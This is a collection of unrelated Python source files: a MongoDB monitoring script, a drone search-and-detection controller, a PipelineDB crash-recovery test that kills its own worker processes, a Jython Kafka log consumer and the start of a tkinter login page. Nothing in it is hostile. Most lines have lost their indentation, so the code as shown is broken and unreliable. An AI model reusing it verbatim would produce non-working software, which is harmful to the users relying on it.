network_bytesIn_persecond = int(serverStatus_2['network']['bytesIn']) - int(serverStatus['network']['bytesIn'])
network_bytesOut_persecond = int(serverStatus_2['network']['bytesOut']) - int(serverStatus['network']['bytesOut'])
network_numRequests_persecond = int(serverStatus_2['network']['numRequests']) - int(serverStatus['network']['numRequests'])
opcounters_insert_persecond = int(serverStatus_2['opcounters']['insert']) - int(serverStatus['opcounters']['insert'])
opcounters_query_persecond = int(serverStatus_2['opcounters']['query']) - int(serverStatus['opcounters']['query'])
opcounters_update_persecond = int(serverStatus_2['opcounters']['update']) - int(serverStatus['opcounters']['update'])
opcounters_delete_persecond = int(serverStatus_2['opcounters']['delete']) - int(serverStatus['opcounters']['delete'])
opcounters_command_persecond = int(serverStatus_2['opcounters']['command']) - int(serverStatus['opcounters']['command'])
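        # The two serverStatus samples above are taken one second apart (time.sleep(1)), so the raw counter
        # differences approximate per-second rates; e.g. if network.bytesIn grows from 10000 to 12048 between
        # the two samples, network_bytesIn_persecond is 2048 (numbers are illustrative only).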
#replset
try:
repl=serverStatus['repl']
setName=repl['setName']
replset=1
if repl['secondary']== True:
repl_role='secondary'
repl_role_new='s'
else:
repl_role='master'
repl_role_new='m'
except:
replset=0
repl_role='master'
repl_role_new='m'
pass
##################### insert data to mysql server#############################
sql = "insert into mongodb_status(server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond) values(%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s,%s);"
param = (server_id,host,port,tags,connect,replset,repl_role,ok,uptime,version,connections_current,connections_available,globalLock_currentQueue,globalLock_activeClients,mem_bits,mem_resident,mem_virtual,mem_supported,mem_mapped,mem_mappedWithJournal,network_bytesIn_persecond,network_bytesOut_persecond,network_numRequests_persecond,opcounters_insert_persecond,opcounters_query_persecond,opcounters_update_persecond,opcounters_delete_persecond,opcounters_command_persecond)
func.mysql_exec(sql,param)
role='m'
func.update_db_status_init(repl_role_new,version,host,port,tags)
except Exception, e:
logger_msg="check mongodb %s:%s : %s" %(host,port,e)
logger.warning(logger_msg)
try:
connect=0
sql="insert into mongodb_status(server_id,host,port,tags,connect) values(%s,%s,%s,%s,%s)"
param=(server_id,host,port,tags,connect)
func.mysql_exec(sql,param)
except Exception, e:
logger.error(e)
sys.exit(1)
finally:
sys.exit(1)
finally:
func.check_db_status(server_id,host,port,tags,'mongodb')
sys.exit(1)
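    # Note: this function always exits via sys.exit(1) because it runs in its own multiprocessing.Process
    # (see main() below); the exit terminates only that child worker, not the controller.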
def main():
servers = func.mysql_query('select id,host,port,username,password,tags from db_cfg_mongodb where is_delete=0 and monitor=1;')
logger.info("check mongodb controller started.")
if servers:
plist = []
for row in servers:
server_id=row[0]
host=row[1]
port=row[2]
username=row[3]
password=row[4]
tags=row[5]
p = Process(target = check_mongodb, args = (host,port,username,password,server_id,tags))
plist.append(p)
p.start()
for p in plist:
p.join()
else:
logger.warning("check mongodb: not found any servers")
logger.info("check mongodb controller finished.")
if __name__=='__main__':
main()
|
main.py
|
#import RPi.GPIO as GPIO
import time
import ctypes as ct
import shutil
import os
import glob
import numpy as np
import math
import logging
import json
import cv2
import utm
import matplotlib.pyplot as plt
from PIL import Image
import datetime
import multiprocessing
from pathlib import Path
import sys
detection = False
# to find the local modules we need to add the folders to sys.path
cur_file_path = Path(__file__).resolve().parent
sys.path.insert(1, cur_file_path )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'PLAN') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'DET') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'LFR', 'python') )
sys.path.insert(1, os.path.join(cur_file_path, '..', 'CAM') )
import pyaos
detection = True
if detection :
from detector import Detector
from Planner import Planner
from FlyingControl import DroneFlyingControl
#from ..DRONE.DroneCom import DroneCommunication, ReadGPSReceivedLogFiles, ReadNewGPSReceivedLogFiles
from Renderer_Detector import Renderer
from CameraControl import CameraControl
test_server = True
if test_server :
from ServerUpload import ServerUpload
from DroneCom import DroneCommunication
from LFR_utils import hdr_mean_adjust
from PathVisualizer import Visualizer
from utils import download_file
from scipy.stats import circmean
import random
from scipy import interpolate
from statistics import mean
#New Changes to send Email
import email, smtplib, ssl
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
import asyncio
import aiohttp
class InitializationClass():
_sitename = None
_DroneFlyingSpeed = 1 # in 0.1m/s
_FasterDroneFlyingSpeed = 3 # in 0.1m/s
_WayPointHoldingTime = 5
_PiWayPointRadiusCheck = 5.0
_TimeDelayForFlirConnection = 7.0
_ImageSamplingDistance = 1.0
_LowerThreshold = 0.05
_UpperThreshold = 0.10
_Flying_Height = 35
_MaxFlightTime = 20*60
_area_sides = None
_ReadfromFile = False
_Render = True
_Detect = True
_PrePlannedPath = False
_legacy_normalization = False
_AlwaysRenderSeparetly = True
_SimulateonCPU = False
_GridAlignedPathPlanning = True
_WritePoses = False
_DetectWithPiImages = False
_SendEmail = False
_ProjectIndividualImages = False
_GrabVideoFrames = True
_ContinuousIntegration = True
_ContinuousIntegrationAfterNoofImages = 10
_GridSideLength = 30
_RotationAngle = 0
_NormalizedDistance = 30
_pwmPin = 18
_dc = 10
_FieldofView = 43.10803984095769#43.50668199945787 #50.815436217896945
_device = "MYRIAD" # "CPU" or "MYRIAD"(compute stick)
_threshold = 0.05
_aug = "noAHE"
_yoloversion = "yolov4-tiny"
_source = '/data/camera/*/*.tiff'
_basedatapath = '../data'
_DroneAttached = False
_FlirAttached = False
_IntelStickAttached = True
_StartLatitudeGlobal = 0.0
_StartLongitudeGlobal = 0.0
_PiImagesFolder = None
_Download_Dest = None
_WritePosesPath = None
_SavProjPath = None
_ObjModelPath = None
_ObjModelImagePath = None
_LFRPath = None
_DemInfoJSOn = None
_DemInfoDict = None
_CenterUTMInfo = None
_CenterEast = None
_CenterNorth = None
_prob_map = None
_utm_center = None
_UpdatePathPlanning = False
def __init__(self, sitename, area_sides, ReadfromFile = False, DroneAttached = True, FlirAttached = True, IntelStickAttached = True, DroneFlyingSpeed = 10, Flying_Height = 35,
ImageSamplingDistance = 1.0, MaxFlightTime = 20*60, FieldofView = 43.10803984095769,GridSideLength = 30, GrabVideoFrames = True, StartLatitudeGlobal = 0.0, dc = 10,
StartLongitudeGlobal = 0.0 , FasterDroneFlyingSpeed = 10, WayPointHoldingTime = 5, PiWayPointRadiusCheck = 5.0, TimeDelayForFlirConnection = 7.0, pwmPin = 18,
LowerThreshold = 0.05, UpperThreshold = 0.10, Render = True, Detect = True, PrePlannedPath = False, legacy_normalization = False, _NormalizedDistance = 30,
AlwaysRenderSeparetly = True, SimulateonCPU = False, GridAlignedPathPlanning = True, ContinuousIntegration = True, ContinuousIntegrationAfterNoofImages = 10,
DetectWithPiImages = False, SendEmail = False, UpdatePathPlanningflag = False, sender_email = None, receiver_email = None, subject = None, body = None,
ProjectIndividualImages = False, WritePoses = False, aug = "noAHE", yoloversion = "yolov4-tiny",currentpath = '../data',uploadserver = False, baseserver = 'http://localhost:8080',prob_map = None
):
self._sitename = sitename
self._DroneFlyingSpeed = DroneFlyingSpeed # in 0.1m/s
self._FasterDroneFlyingSpeed = FasterDroneFlyingSpeed # in 0.1m/s
self._WayPointHoldingTime = WayPointHoldingTime
self._PiWayPointRadiusCheck = PiWayPointRadiusCheck
self._TimeDelayForFlirConnection = TimeDelayForFlirConnection
self._ImageSamplingDistance = ImageSamplingDistance
self._LowerThreshold = LowerThreshold
self._UpperThreshold = UpperThreshold
self._Flying_Height = Flying_Height
self._MaxFlightTime = MaxFlightTime
self._ReadfromFile = ReadfromFile
self._Render = Render
self._Detect = Detect
self._UpdatePathPlanning = UpdatePathPlanningflag
self._PrePlannedPath = PrePlannedPath
self._legacy_normalization = legacy_normalization
self._AlwaysRenderSeparetly = AlwaysRenderSeparetly
self._SimulateonCPU = SimulateonCPU
self._WritePoses = WritePoses
self._DetectWithPiImages = DetectWithPiImages
self._SendEmail = SendEmail
self._sender_email = sender_email
self._receiver_email = receiver_email
self._subject = subject
self._body = body
self._uploadserver = uploadserver
self._serveraddress = baseserver
self._ProjectIndividualImages = ProjectIndividualImages
self._GrabVideoFrames = GrabVideoFrames
self._ContinuousIntegration = ContinuousIntegration
self._ContinuousIntegrationAfterNoofImages = ContinuousIntegrationAfterNoofImages
self._area_sides = area_sides
self._GridAlignedPathPlanning = GridAlignedPathPlanning
self._GridSideLength = GridSideLength
self._prob_map = prob_map
self._RotationAngle = 0
self._NormalizedDistance = 30
self._pwmPin = pwmPin
self._dc = dc
self._FieldofView = FieldofView #50.815436217896945
self._DroneAttached = DroneAttached
self._FlirAttached = FlirAttached
self._IntelStickAttached = IntelStickAttached
self._device = "MYRIAD" if IntelStickAttached else "CPU" # "CPU" or "MYRIAD"(compute stick)
self._threshold = 0.05
self._aug = aug
self._yoloversion = yoloversion
self._source = '/data/camera/*/*.tiff'
self._basedatapath = currentpath
#if self._SimulateonCPU :
# self._basedatapath = 'D:\\Resilio\\ANAOS\\SIMULATIONS'
#else :
# self._basedatapath = '../data'#'../data'
self._StartLatitudeGlobal = StartLatitudeGlobal
self._StartLongitudeGlobal = StartLongitudeGlobal
if self._DetectWithPiImages :
self._PiImagesFolder = os.path.join(self._basedatapath,'..','data', sitename, 'PiRenderedResults')
self._Download_Dest = os.path.join(self._basedatapath,'..','data', sitename, 'Image')
self._WritePosesPath = os.path.join(self._basedatapath,'..','data', sitename, 'FlightPoses')
self._SavProjPath = os.path.join(self._basedatapath,'..','data', sitename, 'Projections')
self._ObjModelPath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem.obj')
self._ObjModelImagePath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem.png')
self._LFRPath = os.path.join(self._basedatapath,'..','data', sitename, 'DEM')
self._DemInfoJSOn = os.path.join(self._basedatapath,'..','data', sitename, 'DEM','dem_info.json')
with open(self._DemInfoJSOn) as json_file:
self._DemInfoDict = json.load(json_file)
self._CenterUTMInfo = self._DemInfoDict['centerUTM']
self._CenterEast = self._CenterUTMInfo[0]
self._CenterNorth = self._CenterUTMInfo[1]
if not self._PrePlannedPath :
self._utm_center = (self._CenterUTMInfo[0], self._CenterUTMInfo[1], self._CenterUTMInfo[2], self._CenterUTMInfo[3])
##############################################################################
##############################################################################
if __name__ == "__main__":
cur_file_path = Path(__file__).resolve().parent
base_url1 = 'http://140.78.99.183:80'
sitename = "test_flight_server_upload"
#ToDo --- Download All Files and Place in a Folder Locally
location_ref = 'test_flight_server_upload' #Find Way to Get locationref from the server
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem.obj'),remote_file= location_ref + ".obj")
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem.png'),remote_file= location_ref + ".png")
#download_file(base_url1,"locations",local_file = os.path.join(cur_file_path,'..','data',sitename,'DEM','dem_info.json'),remote_file= location_ref + ".json")
InitializedValuesClass = InitializationClass(sitename=sitename,area_sides = (90,90), ReadfromFile=False, DroneAttached=True,FlirAttached=True,
DroneFlyingSpeed=4,Flying_Height = 30, GridSideLength = 90, UpdatePathPlanningflag = False, SimulateonCPU=False, currentpath = cur_file_path)
#vis = Visualizer( InitializedValuesClass._LFRPath )
#PlanningAlgoClass = Planner( InitializedValuesClass._utm_center, InitializedValuesClass._area_sides, tile_distance = InitializedValuesClass._GridSideLength, prob_map=InitializedValuesClass._prob_map, debug=False,vis=None, results_folder=os.path.join(InitializedValuesClass._basedatapath,'FlightResults', InitializedValuesClass._sitename, 'Log'),gridalignedplanpath = InitializedValuesClass._GridAlignedPathPlanning)
CurrentGPSInfoQueue = multiprocessing.Queue(maxsize=200) # queue which stores gps tagged frames.
# reading with `CurrentGPSInfoQueue.get()` returns a dictionary of the form
# { 'Latitude' = # gps lat in degrees
# 'Longitude' = # gps lon in degrees
# 'Altitude' = # absolute altitude
# 'BaroAltitude' = # relative altitude = (value / 100)
# 'TargetHoldTime' = # Counter set to fixed value and counts down to 0 once it reaches waypoint
# 'CompassHeading' = # compass values in step of 2 degrees
# 'Image' = #Acquired frame from framegrabber
# }
SendWayPointInfoQueue = multiprocessing.Queue(maxsize=20) # waypoint information queue.get() returns a dictionary as:
# { 'Latitude': # value = int (gps lat x 10000000),
# 'Longitude': # value = int (gps lon x 10000000),
# 'Altitude': # value should be desired Altitude in m above starting height,
# 'Speed': # value should be desired speed in m/s,
# 'Index':
# }
RenderingQueue = multiprocessing.Queue(maxsize=200) # queue with geotagged frames with ~1m spacing
# in the form of a dictionary
# { 'Latitude' = #
# 'Longitude' = #
# 'Altitude' = #
# 'CompassHeading' = #
# 'Image' = #
# 'StartingHeight' = #
# 'Render' = # boolean indicating after adding which frame we should render
# 'UpdatePlanningAlgo' = # boolean indicating after adding which frame we should send the detections
# }
FrameQueue = multiprocessing.Queue(maxsize=200) # a queue element is a dictionary of the form
# { 'Frames': [img1, img2, ...],
# 'FrameTimes': [time1, time2, ...]
# }
DetectionInfoQueue = multiprocessing.Queue(maxsize=200) # a queue element is a dictionary of the form
# { 'PreviousVirtualCamPos': (gps_lat,gps_lon)),
# 'DLDetections': [{'gps':(gps_lat,gps_lon), 'conf': #}, {'gps':(gps_lat,gps_lon), 'conf': #}, ...]
# 'DetectedImageName' : #full written image name
# }
uploadqueue = multiprocessing.Queue(maxsize=200)
# events are only binary
DroneProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the DroneCommunication process terminally (only do once)
FlyingProcessEvent = multiprocessing.Event() # if enabled (signaled from the DroneFlyingControl) the last waypoint has been reached
RenderingProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the Renderer process terminally (only do once)
CameraProcessEvent = multiprocessing.Event() # enabling this event (.set) stops the camera process terminally (only do once)
GetFramesEvent = multiprocessing.Event() # enable if you want to retrieve recorded frames
RecordEvent = multiprocessing.Event() # enable if you want to record information while flying
upload_complete_event = multiprocessing.Event()
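    # Process topology (as wired below): CameraControl -> FrameQueue -> DroneCommunication -> CurrentGPSInfoQueue
    # -> DroneFlyingControl -> RenderingQueue -> Renderer -> uploadqueue -> ServerUpload; DetectionInfoQueue feeds
    # detections back from the Renderer to the flying/planning process, and SendWayPointInfoQueue carries waypoints
    # from DroneFlyingControl back to DroneCommunication.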
if InitializedValuesClass._ReadfromFile:
GPSReceivedLogFile = os.path.join(InitializedValuesClass._basedatapath,'FlightResults', InitializedValuesClass._sitename, 'GPSReceivedLog.log')
#GPSlogFileInfo = ReadGPSReceivedLogFiles(GPSReceivedLogFile)
GPSlogFileInfo = ReadNewGPSReceivedLogFiles(GPSReceivedLogFile)
else :
GPSlogFileInfo = []
#print(len(GPSReceivedLogFile))
CameraClass = CameraControl(FlirAttached=InitializedValuesClass._FlirAttached, AddsynthethicImage=False, out_folder = os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'log'))
# interpolation is done here.
DroneCommunicationClass = DroneCommunication(simulate=False,GPSLog=GPSlogFileInfo, interpolation=True,extrapolate=False, AddSynthethicImage=False,FlirAttached = InitializedValuesClass._FlirAttached,
out_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'log'))
# geotagged images are the output here (interpolation and adding GPS) -> input to FlyingControl
# many more images than are actually used
# check if waypoint reached, planning the next waypoints, send waypoint to DroneCom
# selects frames which are one meter apart and send it to Renderer
# Planner is in here
FlyingControlClass = DroneFlyingControl(sitename = InitializedValuesClass._sitename,CenterEast = InitializedValuesClass._CenterEast,CenterNorth = InitializedValuesClass._CenterNorth,
objectmodelpath=InitializedValuesClass._ObjModelPath,basedatapath=InitializedValuesClass._basedatapath,Render=True,
FlirAttached = InitializedValuesClass._FlirAttached,Flying_Height = InitializedValuesClass._Flying_Height,
DroneFlyingSpeed = InitializedValuesClass._DroneFlyingSpeed,RenderAfter = 2,CenterUTMInfo=InitializedValuesClass._CenterUTMInfo,
out_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data', InitializedValuesClass._sitename, 'images'),
area_sides=InitializedValuesClass._area_sides,GridSideLength=InitializedValuesClass._GridSideLength,GridAlignedPathPlanning=InitializedValuesClass._GridAlignedPathPlanning,
prob_map=InitializedValuesClass._prob_map,UpdatePathPlanningflag = InitializedValuesClass._UpdatePathPlanning,
adddebugInfo=True)
# Renderer does undistortion, LFR, DET
RendererClass = Renderer(CenterUTMInfo=InitializedValuesClass._CenterUTMInfo,ObjModelPath=InitializedValuesClass._ObjModelPath,
Detect=True,ObjModelImagePath=InitializedValuesClass._ObjModelImagePath,basedatapath=InitializedValuesClass._basedatapath,
sitename=InitializedValuesClass._sitename,results_folder=os.path.join(InitializedValuesClass._basedatapath,'..','data',InitializedValuesClass._sitename, 'results'),
FieldofView=InitializedValuesClass._FieldofView,device="MYRIAD",adddebuginfo=True,uploadserver=True,baseserver=base_url1,locationid=location_ref)
serverclass = ServerUpload(serveraddress=base_url1,locationid= location_ref)
processes = []
uploadprocess = multiprocessing.Process(name = 'uploadprocess', target=serverclass.dummy_run, args=(uploadqueue, upload_complete_event))
processes.append(uploadprocess)
uploadprocess.start()
RenderProcess = multiprocessing.Process(name='RenderingProcess', target=RendererClass.RendererandDetectContinuous, args=(RenderingQueue, DetectionInfoQueue, uploadqueue, RenderingProcessEvent))
processes.append(RenderProcess)
RenderProcess.start()
time.sleep(2)
DroneCommunicationProcess = multiprocessing.Process(name='DroneCommunicationProcess',target=DroneCommunicationClass.DroneInfo, args=(CurrentGPSInfoQueue,SendWayPointInfoQueue, DroneProcessEvent, FrameQueue, GetFramesEvent, RecordEvent))
processes.append(DroneCommunicationProcess)
DroneCommunicationProcess.start()
FlyingControlProcess = multiprocessing.Process(name='FlyingControlProcess',target= FlyingControlClass.FlyingControl, args=(CurrentGPSInfoQueue,SendWayPointInfoQueue, RenderingQueue, DetectionInfoQueue, FlyingProcessEvent, RecordEvent))
processes.append(FlyingControlProcess)
FlyingControlProcess.start()
CameraFrameAcquireProcess = multiprocessing.Process(name='CameraFrameAcquireProcess', target=CameraClass.AcquireFrames, args=(FrameQueue, CameraProcessEvent, GetFramesEvent))
processes.append(CameraFrameAcquireProcess)
CameraFrameAcquireProcess.start()
while not FlyingProcessEvent.is_set():
time.sleep(10.0)
DroneProcessEvent.set()
CameraProcessEvent.set()
RenderingProcessEvent.set()
upload_complete_event.set()
time.sleep(25.0)
while not FrameQueue.empty():
FramesInfo = FrameQueue.get()
while not CurrentGPSInfoQueue.empty():
FramesInfo = CurrentGPSInfoQueue.get()
while not SendWayPointInfoQueue.empty():
FramesInfo = SendWayPointInfoQueue.get()
while not RenderingQueue.empty():
FramesInfo = RenderingQueue.get()
while not uploadqueue.empty():
FramesInfo = uploadqueue.get()
while not DetectionInfoQueue.empty():
FramesInfo = DetectionInfoQueue.get()
CurrentGPSInfoQueue.close()
SendWayPointInfoQueue.close()
FrameQueue.close()
RenderingQueue.close()
uploadqueue.close()
DetectionInfoQueue.close()
    print('Wrapping up all processes')
for process in processes:
process.join(5)
print('CameraFrameAcquireProcess.is_alive()', CameraFrameAcquireProcess.is_alive())
print('DroneCommunicationProcess.is_alive()', DroneCommunicationProcess.is_alive())
print('FlyingControlProcess.is_alive()', FlyingControlProcess.is_alive())
print('RenderProcess.is_alive()', RenderProcess.is_alive())
if CameraFrameAcquireProcess.is_alive() :
CameraFrameAcquireProcess.terminate()
CameraFrameAcquireProcess.join()
print('CameraFrameAcquireProcess.is_alive()', CameraFrameAcquireProcess.is_alive())
if DroneCommunicationProcess.is_alive() :
DroneCommunicationProcess.terminate()
DroneCommunicationProcess.join()
print('DroneCommunicationProcess.is_alive()', DroneCommunicationProcess.is_alive())
if FlyingControlProcess.is_alive() :
FlyingControlProcess.terminate()
FlyingControlProcess.join()
print('FlyingControlProcess.is_alive()', FlyingControlProcess.is_alive())
if RenderProcess.is_alive() :
RenderProcess.terminate()
RenderProcess.join()
print('RenderProcess.is_alive()', RenderProcess.is_alive())
if uploadprocess.is_alive() :
uploadprocess.terminate()
uploadprocess.join()
print('uploadprocess.is_alive()', uploadprocess.is_alive())
    print('All processes done')
#f.close()
#CurrentDronedata.updateReceiveCommand(False)
#for thread in enumerate(threads):
# thread.join()
##############################################################################
##############################################################################
|
test_crash_recovery.py
|
from base import pipeline, clean_db
import os
import random
import signal
from subprocess import check_output, CalledProcessError
import threading
import time
def _get_pids(grep_str):
try:
out = check_output('ps aux | grep "postgres" | grep "%s"' % grep_str,
shell=True).split('\n')
except CalledProcessError:
return []
out = filter(lambda s: len(s), out)
if not out:
return []
pids = []
for line in out:
line = line.split()
pid = int(line[1].strip())
pids.append(pid)
return pids
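    # Note: in `ps aux` output the first column is the user and the second column is the PID,
    # hence line.split()[1] above.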
def _get_pid(grep_str):
pids = _get_pids(grep_str)
if not pids:
return -1
return random.choice(pids)
def _kill(pid):
if pid <= 0:
return False
os.kill(pid, signal.SIGTERM)
return True
def get_worker_pids():
return _get_pids('worker[0-9] \[postgres\]')
def get_combiner_pids():
return _get_pids('combiner[0-9] \[postgres\]')
def kill_worker():
return _kill(_get_pid('worker[0-9] \[postgres\]'))
def kill_combiner():
return _kill(_get_pid('combiner[0-9] \[postgres\]'))
def test_simple_crash(pipeline, clean_db):
"""
Test simple worker and combiner crashes.
"""
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_simple_crash', q)
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] == 2
# This batch can potentially get lost.
pipeline.insert('stream0', ['x'], [(1,), (1,)])
assert kill_worker()
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] in [4, 6]
# This batch can potentially get lost.
pipeline.insert('stream0', ['x'], [(1,), (1,)])
assert kill_combiner()
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_simple_crash')[0]
assert result['count'] in [6, 8, 10]
# To ensure that all remaining events in ZMQ queues have been consumed
time.sleep(2)
def test_concurrent_crash(pipeline, clean_db):
"""
    Test worker and combiner crashes while inserts are running concurrently.
"""
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_concurrent_crash', q)
batch_size = 25000
desc = [0, 0, False]
vals = [(1,)] * batch_size
def insert():
while True:
pipeline.insert('stream0', ['x'], vals)
desc[1] += batch_size
if desc[2]:
break
def kill():
for _ in xrange(30):
r = random.random()
if r > 0.85:
desc[0] += kill_combiner()
if r < 0.15:
desc[0] += kill_worker()
time.sleep(0.1)
desc[2] = True
threads = [threading.Thread(target=insert),
threading.Thread(target=kill)]
map(lambda t: t.start(), threads)
map(lambda t: t.join(), threads)
num_killed = desc[0]
num_inserted = desc[1]
result = pipeline.execute('SELECT count FROM test_concurrent_crash')[0]
assert num_killed > 0
assert result['count'] <= num_inserted
assert result['count'] >= num_inserted - (num_killed * batch_size)
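    # Lower-bound reasoning: each kill can lose at most one in-flight batch of `batch_size` events, so with
    # `num_killed` kills the recorded count can trail the number of inserted events by at most
    # num_killed * batch_size.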
# To ensure that all remaining events in ZMQ queues have been consumed
time.sleep(2)
def test_restart_recovery(pipeline, clean_db):
pipeline.create_stream('stream0', x='int')
q = 'SELECT COUNT(*) FROM stream0'
pipeline.create_cv('test_restart_recovery', q)
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 2
# Need to sleep here, otherwise on restart the materialization table is
# empty. Not sure why.
time.sleep(0.1)
# Restart.
pipeline.stop()
pipeline.run()
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 2
pipeline.insert('stream0', ['x'], [(1,), (1,)])
result = pipeline.execute('SELECT * FROM test_restart_recovery')[0]
assert result['count'] == 4
def test_postmaster_worker_recovery(pipeline, clean_db):
"""
Verify that the postmaster only restarts crashed worker processes, and does not
attempt to start them when the continuous query scheduler should.
"""
expected_workers = len(get_worker_pids())
assert expected_workers > 0
expected_combiners = len(get_combiner_pids())
assert expected_combiners > 0
def backend():
try:
# Just keep a long-running backend connection open
client = pipeline.engine.connect()
client.execute('SELECT pg_sleep(10000)')
except:
pass
t = threading.Thread(target=backend)
t.start()
attempts = 0
result = None
backend_pid = 0
while not result and attempts < 10:
result = pipeline.execute("""SELECT pid, query FROM pg_stat_activity WHERE lower(query) LIKE '%%pg_sleep%%'""")[0]
time.sleep(1)
attempts += 1
assert result
backend_pid = result['pid']
os.kill(backend_pid, signal.SIGKILL)
attempts = 0
pipeline.conn = None
while attempts < 20:
try:
pipeline.execute('SELECT 1')
break
except:
time.sleep(1)
pass
attempts += 1
assert pipeline.conn
# Now verify that we have the correct number of CQ worker procs
assert expected_workers == len(get_worker_pids())
assert expected_combiners == len(get_combiner_pids())
|
main.py
|
import datetime
import json
import os
import sys
import time
import traceback
from consumer import KafkaConsumer
from processor import BagheeraMessageProcessor
import Queue
import threading
import config
import codecs
sys.path.extend(['log4j.properties'])
sys.stdout = codecs.getwriter('utf-8')(sys.stdout)
from java.lang import System
from java.util.zip import GZIPOutputStream
from java.io import FileOutputStream
from java.io import PrintWriter
import com.alibaba.fastjson.JSON as JSON
from reportfilter import Filter
def runner(offsets):
fltr = Filter()
queues = {}
bmp_map = {}
offset_update_freq = config.offset_update_freq
for host in config.bagheera_nodes:
for topic in config.topics:
for partition in config.partitions:
queue = Queue.Queue(256)
queues[(host, topic, partition)] = queue
bmp = BagheeraMessageProcessor(queue)
bmp_map[id(bmp)] = (host, topic, partition)
offset = offsets[(host, topic, partition)]
kc = KafkaConsumer(host, {}, topic, partition, bmp.processor, offset, offset_update_freq)
t = threading.Thread(target = kc.process_messages_forever)
t.start()
strtime = datetime.datetime.now().strftime('%Y%m%d%H%M%S')
fos = FileOutputStream("redacted/redacted_%s.gz"%(strtime))
gos = GZIPOutputStream(fos)
writer = PrintWriter(gos)
uf_fos = FileOutputStream("raw/unfiltered_%s.gz"%(strtime))
uf_gos = GZIPOutputStream(uf_fos)
uf_writer = PrintWriter(uf_gos)
err_fos = FileOutputStream("errors/errors_%s.gz"%(strtime))
err_gos = GZIPOutputStream(err_fos)
err_writer = PrintWriter(err_gos)
count = 0
while True:
for htp, q in queues.iteritems():
try:
v = q.get(False)
except Queue.Empty:
continue
if v[1] == 'PUT':
count = count + 1
pid, op, ts, ipaddr, doc_id, payload = v
json_payload = JSON.toJSONString(payload)
uf_writer.println(json_payload)
#TODO: figure out less braindead way of working with
# java.util.HashMaps in jython
try:
filtered = json.loads(json_payload)
# System.out.println('%s %s %d %s %s %s' % (htp[1], op, ts, ipaddr, doc_id, json_payload))
fltr.filter_document(filtered)
filtered['doc_id'] = doc_id
writer.println(json.dumps(filtered))
#print doc_id
except:
err_writer.println(doc_id+" "+json_payload);
if count % 10000 == 0:
print ts
def parse_offsets(filex):
offsets = {}
# lines in this "file" contain one serialized (json) entry per line with following fields
# time_millis hostname topic partition offset
#
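    # A single line might look like this (all values are illustrative only):
    #   {"time_millis": 1400000000000, "hostname": "bagheera1.example.org", "topic": "telemetry", "partition": 0, "offset": 123456}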
for i in open(filex, "r"):
try:
dictx = json.loads(i)
host = dictx['hostname']
topic = dictx['topic']
partition = dictx['partition']
offset = dictx['offset']
offsets[(host, topic, partition)] = offset
except:
pass
if (not offsets) or (len(offsets) != (len(config.topics) * len(config.partitions) * len(config.bagheera_nodes))):
System.err.println("ERROR: could not find valid initial offsets for given configuration")
sys.exit(1)
return offsets
if __name__ == '__main__':
if len(sys.argv) != 2:
System.err.println("Needs file containing offsets as first argument")
sys.exit(1)
try:
runner(parse_offsets(sys.argv[1]))
except:
System.err.println("ERROR: " + traceback.format_exc())
finally:
System.exit(1)
|
LoginPage.py
|
# -*- coding: utf-8 -*-
import tkinter as tk
import tkinter.ttk as ttk
import tkinter.messagebox
import requests, json, re
import threading
import queue
import time
import main_part
class LoginPage(object):
    def __init__(self, root):
        self.root = root
        self.root.geometry("255x255+561+268")
        self.queue = queue.Queue()
        # initialize before LoginPage() so get_users()/save_users() always find the attribute
        self.names_list = []
        self.LoginPage()
def LoginPage(self):
font = "-family {Microsoft YaHei UI Light} -size 11 -weight " \
"bold -slant roman -underline 0 -overstrike 0"
self.loginPage = tk.Frame(master=self.root, height=261, width=255, bg='black')
self.loginPage.pack()
username = tk.StringVar()
self.userNameEntry = ttk.Combobox(self.loginPage, textvariable=username)
self.userNameEntry.place(relx=0.23, rely=0.23, height=25, relwidth=0.59)
self.userNameEntry.configure(background="white",
font=font,
foreground="#000000",
width=154,)
self.get_users_thread()
room = tk.StringVar()
self.roomChooseEntry = ttk.Combobox(self.loginPage, textvariable=room)
self.roomChooseEntry.place(relx=0.23, rely=0.58, height=25, relwidth=0.59)
self.roomChooseEntry.configure(font=font,
background="white",
foreground="#000000",)
self.roomChooseEntry.bind('<Return>', self.login)
self.get_rooms_thread()
self.LoginButton = tk.Button(self.loginPage, command=self.login)
self.LoginButton.place(relx=0.402, rely=0.8, height=28, width=45)
self.LoginButton.configure(activebackground="#ececec",
activeforeground="#000000",
background="#000000",
disabledforeground="#a3a3a3",
foreground="#ffffff",
highlightbackground="#d9d9d9",
highlightcolor="black",
pady="0",
relief='groove',
